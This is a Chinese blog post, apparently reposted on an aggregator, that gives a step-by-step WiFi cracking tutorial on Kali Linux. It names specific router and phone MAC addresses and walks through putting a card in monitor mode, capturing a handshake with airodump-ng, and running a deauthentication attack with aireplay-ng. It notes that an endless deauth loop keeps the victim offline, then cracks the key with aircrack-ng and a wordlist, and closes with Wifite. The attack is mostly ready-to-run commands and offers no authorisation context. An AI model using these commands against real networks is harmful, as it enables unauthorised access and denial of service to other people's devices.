zoukankan      html  css  js  c++  java
  • wifi破解

    路由器的

    78:44:FD:49:79:80

    手机的

    14:9D:09:C9:E2:ED

    一:环境准备

    kali系统

    密码字典(先将密码字典拷贝到kali系统中)

    自己写一个:里面包含wifi的密码

    vim /root/mima.txt

    aptech123

    二:破解流程

    1:连接无线网卡

     

    2:查看网卡状态

    Iwconfig

     

    3:设置网卡为监听模式

    airmon-ng check kill

    airmon-ng start wlan0

    4:扫描无线网络

    airodump-ng wlan0

    记录下来你要破解的那个路由器的BSSID,以及该路由器当前连接的手机的信息station

    还要记录下路由器使用的信号通道

    如果扫描不到,可以重复扫描,扫描到可以ctrl+c取消扫描,记下两个mac和信道

     

    5:抓取握手包(不要停止):

    airodump-ng -c 6 --ivs -w test --bssid 78:44:FD:49:79:80  wlan0

    -c:路由器使用的信号通道

    --ivs:将抓取到的包保存为ivs的文件格式

    -w:指定保存的握手包的名字

    --bssid:指定抓取到的路由器的物理地址

    wlan0:kali系统的无线网卡的名字

     

    6:再打开另一个终端对手机终端进行反认证攻击

    给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

    aireplay-ng -0 10 -a 78:44:FD:49:79:80 -c 14:9D:09:C9:E2:ED wlan0

     

    -0(零):冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网

    -a:指定路由器的物理地址

    -c:指定手机的物理地址

    wlan0mon:kali系统的无线网卡的名字

    7:利用密码字典破解密码

    aircrack-ng -w /root/mima.txt /root/test-01.ivs

    Wifite工具

    root@kali:~# wifite –help

    root@kali:~# ifconfig wlan0 down

    root@kali:~# iwconfig wlan0 mode monitor

    root@kali:~# ifconfig wlan0 up

    root@kali:~# iwconfig

     

    root@kali:~#wifite

     

  • 相关阅读:
    python--向钉钉群发送消息(亲测可用)
    python--注册钉钉回调事件(亲测可用)
    Gradle
    SpringBoot 中thymeleaf模板引擎的使用
    SpringBoot对静态资源的映射规则
    SpringBoot的日志使用
    rsync实现文件同步
    python学习: 优秀Python学习资源收集汇总--转
    Python高级特性: 12步轻松搞定Python装饰器
    Python常见问题
  • 原文地址:https://www.cnblogs.com/ccshi/p/13413389.html
Copyright © 2011-2022 走看看